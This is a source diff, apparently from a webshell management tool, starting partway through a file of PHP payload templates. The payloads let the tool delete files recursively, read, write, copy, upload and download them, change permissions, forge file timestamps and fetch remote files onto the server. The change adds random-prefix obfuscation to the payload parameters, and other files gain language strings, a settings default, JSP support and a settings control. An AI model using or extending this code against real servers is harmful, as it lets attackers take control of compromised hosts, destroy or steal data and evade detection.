-    _: `function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=base64_decode(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}`,
-    [arg1]: "#{base64::path}"
+    _: `function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}`,
+    [arg1]: "#{newbase64::path}"
   },
 
   create_file: {
-    _: `echo @fwrite(fopen(base64_decode($_POST["${arg1}"]),"w"),base64_decode($_POST["${arg2}"]))?"1":"0";`,
-    [arg1]: "#{base64::path}",
-    [arg2]: "#{base64::content}"
+    _: `echo @fwrite(fopen(base64_decode(substr($_POST["${arg1}"],#randomPrefix#)),"w"),base64_decode(substr($_POST["${arg2}"],#randomPrefix#)))?"1":"0";`,
+    [arg1]: "#{newbase64::path}",
+    [arg2]: "#{newbase64::content}"
   },
 
   read_file: {
-    _: `$F=base64_decode($_POST["${arg1}"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);`,
-    [arg1]: "#{base64::path}"
+    _: `$F=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);`,
+    [arg1]: "#{newbase64::path}"
   },
 
   copy: {
-    _: `$m=get_magic_quotes_gpc();$fc=base64_decode($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$fp=base64_decode($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);function xcopy($src,$dest){if(is_file($src)){if(!copy($src,$dest))return false;else return true;}$m=@dir($src);if(!is_dir($dest))if(!@mkdir($dest))return false;while($f=$m->read()){$isrc=$src.chr(47).$f;$idest=$dest.chr(47).$f;if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){if(!xcopy($isrc,$idest))return false;}else if(is_file($isrc)){if(!copy($isrc,$idest))return false;}}return true;}echo(xcopy($fc,$fp)?"1":"0");`,
-    [arg1]: "#{base64::path}",
-    [arg2]: "#{base64::target}"
+    _: `$m=get_magic_quotes_gpc();$fc=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$fp=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));function xcopy($src,$dest){if(is_file($src)){if(!copy($src,$dest))return false;else return true;}$m=@dir($src);if(!is_dir($dest))if(!@mkdir($dest))return false;while($f=$m->read()){$isrc=$src.chr(47).$f;$idest=$dest.chr(47).$f;if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){if(!xcopy($isrc,$idest))return false;}else if(is_file($isrc)){if(!copy($isrc,$idest))return false;}}return true;}echo(xcopy($fc,$fp)?"1":"0");`,
+    [arg1]: "#{newbase64::path}",
+    [arg2]: "#{newbase64::target}"
   },
 
   download_file: {
-    _: `$F=base64_decode(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");}`,
-    [arg1]: "#{base64::path}"
+    _: `$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");}`,
+    [arg1]: "#{newbase64::path}"
   },
 
   upload_file: {
-    _: `$f=base64_decode($_POST["${arg1}"]);$c=$_POST["${arg2}"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");`,
-    [arg1]: "#{base64::path}",
+    _: `$f=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$c=$_POST["${arg2}"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");`,
+    [arg1]: "#{newbase64::path}",
     [arg2]: "#{buffer::content}"
   },
 
   rename: {
-    _: `$m=get_magic_quotes_gpc();$src=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$dst=base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);echo(rename($src,$dst)?"1":"0");`,
-    [arg1]: "#{base64::path}",
-    [arg2]: "#{base64::name}"
+    _: `$m=get_magic_quotes_gpc();$src=base64_decode(substr(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$dst=base64_decode(substr(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));echo(rename($src,$dst)?"1":"0");`,
+    [arg1]: "#{newbase64::path}",
+    [arg2]: "#{newbase64::name}"
   },
 
   retime: {
-    _: `$m=get_magic_quotes_gpc();$FN=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$TM=strtotime(base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]));if(file_exists($FN)){echo(@touch($FN,$TM,$TM)?"1":"0");}else{echo("0");};`,
-    [arg1]: "#{base64::path}",
-    [arg2]: "#{base64::time}"
+    _: `$m=get_magic_quotes_gpc();$FN=base64_decode(substr(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$TM=strtotime(base64_decode(substr(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]),#randomPrefix#));if(file_exists($FN)){echo(@touch($FN,$TM,$TM)?"1":"0");}else{echo("0");};`,
+    [arg1]: "#{newbase64::path}",
+    [arg2]: "#{newbase64::time}"
   },
 
   chmod: {
-    _: `$m=get_magic_quotes_gpc();$FN=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$mode=base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);echo(chmod($FN,octdec($mode))?"1":"0");`,
-    [arg1]: "#{base64::path}",
-    [arg2]: "#{base64::mode}"
+    _: `$m=get_magic_quotes_gpc();$FN=base64_decode(substr(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$mode=base64_decode(substr(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));echo(chmod($FN,octdec($mode))?"1":"0");`,
+    [arg1]: "#{newbase64::path}",
+    [arg2]: "#{newbase64::mode}"
   },
 
   mkdir: {
-    _: `$m=get_magic_quotes_gpc();$f=base64_decode($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);echo(mkdir($f)?"1":"0");`,
-    [arg1]: "#{base64::path}"
+    _: `$m=get_magic_quotes_gpc();$f=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));echo(mkdir($f)?"1":"0");`,
+    [arg1]: "#{newbase64::path}"
   },
 
   wget: {
-    _: `$fR=base64_decode($_POST["${arg1}"]);$fL=base64_decode($_POST["${arg2}"]);$F=@fopen($fR,chr(114));$L=@fopen($fL,chr(119));if($F && $L){while(!feof($F))@fwrite($L,@fgetc($F));@fclose($F);@fclose($L);echo("1");}else{echo("0");};`,
-    [arg1]: "#{base64::url}",
-    [arg2]: "#{base64::path}"
+    _: `$fR=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$fL=base64_decode(substr($_POST["${arg2}"],#randomPrefix#));$F=@fopen($fR,chr(114));$L=@fopen($fL,chr(119));if($F && $L){while(!feof($F))@fwrite($L,@fgetc($F));@fclose($F);@fclose($L);echo("1");}else{echo("0");};`,
+    [arg1]: "#{newbase64::url}",
+    [arg2]: "#{newbase64::path}"
   }
 })
\ No newline at end of file

source/language/en.js

@@ -177,6 +177,7 @@ module.exports = {
         nohttps: 'Ignore HTTPS certificate',
         usemultipart: 'Use Multipart send payload',
         addMassData: 'Add garbage data in payload',
+        randomPrefix: 'Random prefix length',
         userandomvariable: 'Use random English word variables',
         chunk: {
           title: 'Chunked Transfer (Experimentally)',

source/language/zh.js

@@ -180,6 +180,7 @@ module.exports = {
         usemultipart: '使用 Multipart 发包',
         userandomvariable: '使用随机英文单词变量',
         addMassData: '增加垃圾数据',
+        randomPrefix: '随机前缀长度',
         chunk: {
           title: '分块传输(实验性功能)',
           usechunk: '开启分块传输发包',

source/language/zh_hk.js

@@ -178,6 +178,7 @@ module.exports = {
         nohttps: '忽略HTTPS證書',
         usemultipart: '使用 Multipart 發包',
         addMassData: '增加垃圾數據',
+        randomPrefix: '隨機前綴長度',
         userandomvariable: '使用隨機英文單詞變量',
         chunk: {
           title: '分塊傳輸(實驗性功能)',

source/language/zh_tw.js

@@ -178,6 +178,7 @@ module.exports = {
         nohttps: '忽略HTTPS證書',
         usemultipart: '使用 Multipart 發包',
         addMassData: '增加垃圾數據',
+        randomPrefix: '隨機前綴長度',
         userandomvariable: '使用隨機英文單詞變量',
         chunk: {
           title: '分塊傳輸(實驗性功能)',

source/modules/settings/adefault.js

@@ -28,7 +28,8 @@ class ADefault {
         others: {
           "ignore-https": 0,
           "use-random-variable": 0,
-          "request-timeout": '10000'
+          "request-timeout": '10000',
+          "random-Prefix": '2'
         }
       },
       terminal: {

source/modules/settings/encoders.js

@@ -760,7 +760,7 @@ module.exports = {
       !fs.existsSync(userencoder_path) ?
         fs.mkdirSync(userencoder_path) :
         null;
-      ['asp', 'aspx', 'php', 'custom'].map((t) => {
+      ['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
         !fs.existsSync(path.join(userencoder_path, `${t}`)) ?
           fs.mkdirSync(path.join(userencoder_path, `${t}`)) :
           null;
@@ -807,7 +807,7 @@ module.exports = {
       !fs.existsSync(userdecoder_path) ?
         fs.mkdirSync(userdecoder_path) :
         null;
-      ['asp', 'aspx', 'php', 'custom'].map((t) => {
+      ['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
         !fs.existsSync(path.join(userdecoder_path, `${t}`)) ?
           fs.mkdirSync(path.join(userdecoder_path, `${t}`)) :
           null;

source/modules/shellmanager/list/form.js

@@ -267,6 +267,7 @@ class Form {
           "php": /.+\.ph(p[345]?|s|t|tml)/,
           "aspx": /.+\.as(px|mx)/,
           "asp": /.+\.(as(p|a|hx)|c(dx|er))/,
+          "jsp": /.+\.(jsp[x]?)/,
           "custom": /.+\.((jsp[x]?)|cgi)/
         }
         let typecombo = form.getCombo('type');
@@ -276,6 +277,8 @@ class Form {
           typecombo.selectOption(typecombo.getOption('aspx').index);
         } else if (file_match.asp.test(id) == true) {
           typecombo.selectOption(typecombo.getOption('asp').index);
+        } else if (file_match.jsp.test(id) == true) {
+          typecombo.selectOption(typecombo.getOption('jsp').index);
         } else if (file_match.custom.test(id) == true) {
           typecombo.selectOption(typecombo.getOption('custom').index);
         }
@@ -467,6 +470,7 @@ class Form {
       'ignore-https': 0,
       'use-multipart': 0,
       'add-MassData': 0,
+      'random-Prefix': '2',
       'use-random-variable': 0,
       'use-chunk': 0,
       'chunk-step-byte-min': 2,
@@ -608,9 +612,32 @@ class Form {
           name: 'filemanager-cache',
           label: LANG['list']['otherConf']['filemanagerCache'],
           checked: opt['filemanager-cache'] === 1
+        }, {
+          type: "label",
+          label: LANG['list']['otherConf']['randomPrefix']
+        }, {
+          type: "combo",
+          inputWidth: 100,
+          name: "random-Prefix",
+          options: ((items) => {
+            let ret = [];
+            // 如果自定义的路径不在items里，则++
+            if (items.indexOf(opt['random-Prefix']) === -1) {
+              items.unshift(opt['random-Prefix']);
+            }
+            items.map((_) => {
+              ret.push({
+                text: _,
+                value: _,
+                selected: opt['random-Prefix'] === _
+              })
+            });
+            return ret;
+          })(['1', '2', '3', '5','10','15'])
         }, {
           type: "label",
           label: LANG['list']['otherConf']['uploadFragment']
+          
         }, {
           type: "combo",
           label: '/kb',